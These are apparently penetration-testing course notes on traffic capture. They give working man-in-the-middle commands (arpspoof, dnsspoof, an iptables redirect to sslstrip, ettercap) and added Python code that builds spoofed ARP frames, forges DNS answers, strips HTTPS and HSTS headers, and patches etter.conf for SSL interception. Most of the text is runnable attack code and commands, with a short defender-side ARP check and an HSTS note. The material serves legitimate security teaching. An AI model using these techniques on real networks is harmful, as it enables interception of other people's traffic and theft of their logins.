
rspeight10 | Advanced Penetration Testing | Module 6 - Traffic Capture

By: rspeight10 | Related Course: Advanced Penetration Testing | Published: May 16, 2017 | Modified: May 16, 2017

Address Resolution Protocol

Address Resolution Protocol (ARP) translates an IP address to a MAC address.

ARP spoofing (on a switched network: poison the ARP caches of the target host and the gateway so their traffic passes through us)

Tools – Arpspoof

– Logged on to the server

arpspoof -i eth0 -t <target> <gateway>   (tells the target that we are the gateway; we will have to forward the traffic, otherwise the target loses connectivity)

cat /proc/sys/net/ipv4/ip_forward has a value of 0

echo 1 > /proc/sys/net/ipv4/ip_forward – need to change it to 1 (which keeps the traffic moving through us to the real gateway)

– Logged on to the server (second terminal, arpspoof stays in the foreground)

arpspoof -i eth0 -t <gateway> <target>   (the other direction: tells the gateway that we are the target)

arpspoof keeps sending ARP replies (“<ip> is-at <our MAC>”) until stopped



arp -a   (on the target, the gateway’s entry now shows our MAC, which is the sign the cache is poisoned)

ftp || ftp-data   (Wireshark display filter to watch the intercepted FTP session)
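Added example, not part of the course notes: it builds the frame that arpspoof sends (an unsolicited ARP reply claiming the gateway's IP is at the attacker's MAC), decodes it the way Wireshark would, and runs the `arp -a` check over constructed output to find the poisoning. All MAC and IP addresses are made up lab values.

```python
import struct

ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet frame carrying an unsolicited ARP reply '<sender_ip> is-at <sender_mac>'.
    This is what `arpspoof -t <target> <gateway>` sends to the target: sender_ip is the
    gateway's IP but sender_mac is the attacker's, so the target's cache is poisoned."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an ARP frame into the fields tcpdump/Wireshark would display."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[14:22])
    body = frame[22:42]
    return {
        "op": {1: "request", 2: "reply"}.get(op, op),
        "sender_mac": mac_str(body[0:6]),
        "sender_ip": ip_str(body[6:10]),
        "target_mac": mac_str(body[10:16]),
        "target_ip": ip_str(body[16:20]),
    }


def spoofed_macs(arp_a_output: str) -> dict:
    """Parse Linux `arp -a` output; return {mac: [ips]} for every MAC that claims
    more than one IP. After arpspoof the attacker's MAC appears under both its own
    IP and the gateway's, which is the classic sign of a poisoned cache."""
    by_mac = {}
    for line in arp_a_output.splitlines():
        parts = line.split()  # "? (192.168.1.1) at 00:0c:29:aa:aa:aa [ether] on eth0"
        if len(parts) < 4 or parts[2] != "at" or parts[3] == "<incomplete>":
            continue
        by_mac.setdefault(parts[3].lower(), []).append(parts[1].strip("()"))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed addresses for a lab segment; none belong to a real host.
ATTACKER_MAC, ATTACKER_IP = "00:0c:29:aa:aa:aa", "192.168.1.50"
GATEWAY_IP = "192.168.1.1"
VICTIM_MAC, VICTIM_IP = "00:0c:29:76:76:76", "192.168.1.76"

# The frame `arpspoof -i eth0 -t 192.168.1.76 192.168.1.1` would send to the victim
POISON_FRAME = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)

# Constructed `arp -a` output as seen on the victim after poisoning
VICTIM_ARP_A = """\
? (192.168.1.1) at 00:0c:29:aa:aa:aa [ether] on eth0
? (192.168.1.50) at 00:0c:29:aa:aa:aa [ether] on eth0
? (192.168.1.23) at 00:0c:29:23:23:23 [ether] on eth0
? (192.168.1.99) at <incomplete> on eth0
"""

if __name__ == "__main__":
    print(parse_arp(POISON_FRAME))
    print(spoofed_macs(VICTIM_ARP_A))
```

The same `spoofed_macs` check works as a quick defender-side test: run it over `arp -a` from any host and a MAC that owns two IPs (one of them the gateway) is what arpspoof leaves behind.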




Analyzing Network Pt. 2

Wireshark (network protocol analyzer) captures traffic

turn off promiscuous mode

on a switched network you should not be able to see other hosts’ traffic (that is why the ARP spoofing above is needed)

if the traffic is not in plain text (FTP is plain text, so its logins are readable directly), you would have to reverse engineer the protocol or encryption to read it


ip.src == <ip> || ip.dst == <ip>   (Wireshark display filter; ip.addr == <ip> is the same thing)

Domain Controller


wireshark app





DNS (Domain Name System)

DNS translates a name such as www.gmail.com to its IP address

DNS can be spoofed

DNS Cache Poisoning

dnsspoof -i eth0 -f hosts.txt

arpspoof -i eth0 -t <target> <gateway>

arpspoof -i eth0 -t <gateway> <target>   (both directions, as above, so the target’s DNS requests pass through us)

dnsspoof -i eth0 -f /root/hosts.txt   (listens for DNS requests that match the hosts file and answers them with the IPs we chose; the forged reply has to arrive before the real server’s)
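Added example, not dnsspoof's own code: a minimal version of what `dnsspoof -f hosts.txt` does on the wire. It parses a hosts file with wildcards, decodes a victim's A query, and builds the forged response (same transaction ID and question, one A record with the attacker's IP). Queries for names not in the file are ignored so the real server answers them. The hosts file and the attacker IP 192.168.1.50 are constructed.

```python
import fnmatch
import struct


def load_hosts(text: str) -> list:
    """Parse a dnsspoof-style hosts file: one '<ip> <name-or-wildcard>' per line."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ip, pattern = line.split(None, 1)
            entries.append((ip, pattern.strip().lower()))
    return entries


def match_host(entries: list, qname: str):
    """First hosts-file entry whose pattern matches the queried name, or None."""
    qname = qname.rstrip(".").lower()
    for ip, pattern in entries:
        if fnmatch.fnmatchcase(qname, pattern):
            return ip
    return None


def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(qname: str, txid: int, qtype: int = 1) -> bytes:
    """A standard recursive A query, as the victim's stub resolver sends it (constructed input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(pkt: bytes):
    """Return (txid, qname, qtype, raw question section) of a single-question query."""
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question query")
    labels, i = [], 12
    while pkt[i] != 0:
        n = pkt[i]
        labels.append(pkt[i + 1:i + 1 + n].decode())
        i += 1 + n
    i += 1
    qtype, _qclass = struct.unpack("!HH", pkt[i:i + 4])
    return txid, ".".join(labels), qtype, pkt[12:i + 4]


def forge_answer(query: bytes, ip: str, ttl: int = 60) -> bytes:
    """The reply dnsspoof would send: same txid and question, one A record with the
    attacker-chosen IP. The resolver takes the first reply whose txid and question
    match, so this only works because it goes out before the real server answers."""
    txid, _qname, _qtype, question = parse_query(query)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # response, RD+RA, 1 answer
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata  # name = pointer to offset 12
    return header + question + answer


def spoof(entries: list, query: bytes):
    """Forged reply if the queried name is in the hosts file, else None (leave it
    to the real server, which is what dnsspoof -f does for non-matching names)."""
    _txid, qname, qtype, _q = parse_query(query)
    if qtype != 1:
        return None
    ip = match_host(entries, qname)
    return forge_answer(query, ip) if ip else None


# Constructed hosts file; 192.168.1.50 stands in for the attacker's box
HOSTS_TXT = """\
192.168.1.50 *.gmail.com
192.168.1.50 www.example.com
"""
ENTRIES = load_hosts(HOSTS_TXT)

if __name__ == "__main__":
    reply = spoof(ENTRIES, build_query("mail.gmail.com", 0x1234))
    print(reply.hex())
```

Wildcard matching is done with `fnmatch`, which is an assumption about how the pattern `*.gmail.com` should behave; the real tool's rules may differ in corner cases. The ARP spoofing is still required: the query has to reach our interface for the sniffer to see it at all.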




SSL Stripping

SSL Man-in-the-Middle (arpspoof the target so its traffic passes through us first)

enable ARP spoofing

arpspoof -i eth0 -t <target> <gateway>

enable the iptables rule (sends the target’s port-80 traffic, which now passes through us, into sslstrip)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -l 8080   (listens on 8080, talks HTTPS to the real site and serves the victim plain HTTP with the https links rewritten)
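Added example, not sslstrip's own code: a small model of what the process listening on port 8080 has to do with each response it relays. It rewrites `https://` references and `Location` headers to `http://`, remembers which URLs it downgraded so that later plain-HTTP requests from the victim are fetched over TLS upstream, and shows the caveat that matters in practice: a browser that already holds an HSTS entry for the host never sends the plain request, so there is nothing to strip. The response headers and hostnames are constructed.

```python
import re

# https://host[/path...] references inside an HTML/JS body
HTTPS_REF = re.compile(rb"https://([A-Za-z0-9.-]+(?:/[^\s\"'<>]*)?)")


def _norm(hostpath: str) -> str:
    """'host' -> 'host/', so that the same URL is keyed consistently."""
    return hostpath if "/" in hostpath else hostpath + "/"


class Stripper:
    """Minimal model of what sslstrip does behind the port-8080 redirect."""

    def __init__(self):
        self.stripped = set()  # host/path values the victim has been told are plain http

    def rewrite_response(self, headers: dict, body: bytes):
        """Downgrade a server response before relaying it to the victim."""
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "strict-transport-security":
                continue  # must be dropped, or the browser insists on TLS from the next visit on
            if lname == "location" and value.lower().startswith("https://"):
                hp = _norm(value[len("https://"):])
                self.stripped.add(hp)
                value = "http://" + hp
            out[name] = value

        def downgrade(m):
            hp = _norm(m.group(1).decode())
            self.stripped.add(hp)
            return b"http://" + hp.encode()

        return out, HTTPS_REF.sub(downgrade, body)

    def upstream_url(self, host: str, path: str = "/") -> str:
        """When the victim now requests http://host/path, fetch it over TLS ourselves
        if it is one we downgraded; anything else goes to the origin as plain http."""
        hp = _norm(host + path)
        return ("https://" if hp in self.stripped else "http://") + hp


def browser_request_url(hsts_hosts: set, url: str) -> str:
    """Model the victim's browser: a host it already knows via HSTS (or the preload
    list) is upgraded to https before any packet is sent, so the port-80 redirect
    never sees plain HTTP for it and the strip fails."""
    if url.startswith("http://"):
        host = url[len("http://"):].split("/", 1)[0]
        if host in hsts_hosts:
            return "https://" + url[len("http://"):]
    return url


# Constructed origin response; the hostnames are placeholders, not real sites
RESP_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000",
    "Location": "https://bank.example.com",
}
RESP_BODY = (b'<a href="https://bank.example.com/login">Log in</a> '
             b'<img src="https://cdn.example.com/x.png">')

if __name__ == "__main__":
    s = Stripper()
    print(s.rewrite_response(RESP_HEADERS, RESP_BODY))
    print(s.upstream_url("bank.example.com", "/login"))
```

The victim sees nothing but `http://` links and a padlock-free page; the only visible clue is the missing padlock, which is why HSTS (and preloading) exists.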




Traffic Capture: ettercap

ettercap is a Man-in-the-Middle tool, used here to intercept SSL connections

SSL (Secure Sockets Layer) should be used when sending sensitive data across the network.


ettercap -T -i eth0 -M arp:remote /192.168.1.1// /192.168.1.76//   (text mode, ARP MITM between the two hosts; targets are written as MAC/IPs/IPv6/PORTs, so an IP alone is /ip//)

arpspoof -i eth0 -t <target> <gateway>

arpspoof -i eth0 -t <gateway> <target>

cat /proc/sys/net/ipv4/ip_forward   (got reset back to 0)

echo 1 > /proc/sys/net/ipv4/ip_forward   (sets ip_forward to 1)

nano /etc/ettercap/etter.conf

In etter.conf make sure that ec_uid and ec_gid are set to 0 (the [privs] section) and that the two redir_command lines under “# if you use iptables:” are uncommented, so ettercap keeps root and can install the port-80 REDIRECT rule itself.

ettercap turns IPv4 forwarding off (ip_forward resets back to 0 because ettercap does the forwarding itself while it runs)

echo 1 > /proc/sys/net/ipv4/ip_forward   (sets ip_forward back to 1 afterwards)
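Added example, not part of the course or of ettercap: the etter.conf edits above done non-interactively, with a check that reports what is still wrong. It forces `ec_uid`/`ec_gid` to 0 and uncomments only the two `redir_command` lines in the `# if you use iptables:` block, leaving the ipchains block commented. The config text below is a constructed fragment shaped like the stock file (the real one has many more sections); the default values shown are the upstream ones.

```python
import re

# Constructed fragment shaped like /etc/ettercap/etter.conf
ETTER_CONF_DEFAULT = """\
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

[mitm]
arp_storm_delay = 10

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""


def patch_etter_conf(text: str) -> str:
    """Force ec_uid/ec_gid to 0 and uncomment only the two redir_command lines in the
    '# if you use iptables:' block, leaving the ipchains block commented."""
    text = re.sub(r"^(ec_uid|ec_gid)[ \t]*=[ \t]*\d+", r"\1 = 0", text, flags=re.M)
    out, in_iptables = [], False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("# if you use"):
            in_iptables = s.startswith("# if you use iptables")
        elif not s:
            in_iptables = False  # a blank line ends the block
        elif in_iptables and re.match(r"#\s*redir_command_(on|off)\s*=", s):
            line = line.replace("#", "", 1)
        out.append(line)
    return "\n".join(out) + "\n"


def check_etter_conf(text: str) -> list:
    """What is still wrong for an SSL MITM run; an empty list means ready."""
    problems = []
    for key in ("ec_uid", "ec_gid"):
        m = re.search(rf"^{key}[ \t]*=[ \t]*(\d+)", text, flags=re.M)
        if not m or m.group(1) != "0":
            problems.append(f"{key} is not 0 (ettercap drops privileges and cannot run iptables)")
    for cmd in ("redir_command_on", "redir_command_off"):
        if not re.search(rf'^[ \t]*{cmd}[ \t]*=[ \t]*"iptables ', text, flags=re.M):
            problems.append(f"{cmd} for iptables is still commented out")
    return problems


if __name__ == "__main__":
    print(check_etter_conf(ETTER_CONF_DEFAULT))
    print(check_etter_conf(patch_etter_conf(ETTER_CONF_DEFAULT)))
```

Run it against the real file by reading `/etc/ettercap/etter.conf` into `patch_etter_conf` and writing the result back as root; `check_etter_conf` on the written file is the pre-flight check before starting ettercap.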




